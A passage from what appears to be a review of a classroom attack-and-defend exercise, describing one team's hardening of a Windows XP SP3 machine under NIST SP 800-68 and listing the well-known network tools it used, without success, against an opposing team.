Similar to other teams, this team also selected Windows XP SP3 as their machine to be exploited. The team followed two guidelines from NIST: SP 800-68 and the policy template that accompanies the document. The team gave a list of changes that were made to their machine, doing what the other teams did to protect their Windows XP operating system: they disabled file and print sharing, turned on XP's firewall, and changed user accounts and passwords. This team did indicate that they changed the account lockout to zero and set the account lockout to reset after thirty minutes. Team three had only two accounts, one admin and one user. This team renamed the administrator account, changed the password, then disabled the account; it almost seems useless to modify the administrator account if the account is going to be disabled.
The team used several tools for attacking the opposing team's machine: a combination of Wireshark, p0f, EzPWN, Nmap, Ettercap, Nessus, TCP/IP commands, password crackers, Metasploit, and Cain and Abel. The last tool mentioned, Cain and Abel, which does ARP poisoning, might explain why team one mentioned having problems with IP addresses. This team reported no success in exploiting the other team's machine.